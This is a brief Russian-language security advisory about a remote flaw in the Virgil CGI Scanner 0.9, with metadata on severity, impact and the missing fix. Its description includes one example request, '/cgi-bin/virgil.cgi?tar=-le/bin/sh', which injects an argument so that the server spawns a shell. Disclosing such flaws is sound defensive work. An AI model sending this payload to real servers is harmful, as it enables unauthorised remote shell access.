Security Lab

Уязвимость в сканере CGI уязвимостей Virgil

Дата публикации:23.10.2002
Дата изменения:17.10.2006
Всего просмотров:1447
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Virgil CGI Scanner
Описание: Virgil (http://www.computec.ch/) – сканер CGI уязвимостей от Mark Ruef. Специально обработанный запрос способен породить удаленную оболочку с привилегиями CGI сценария. Пример:

/cgi-bin/virgil.cgi?tar=-le/bin/sh

уязвимость обнаружена в Virgil CGI Scanner version 0.9

Ссылки: Virgil CGI Scanner Vulnerability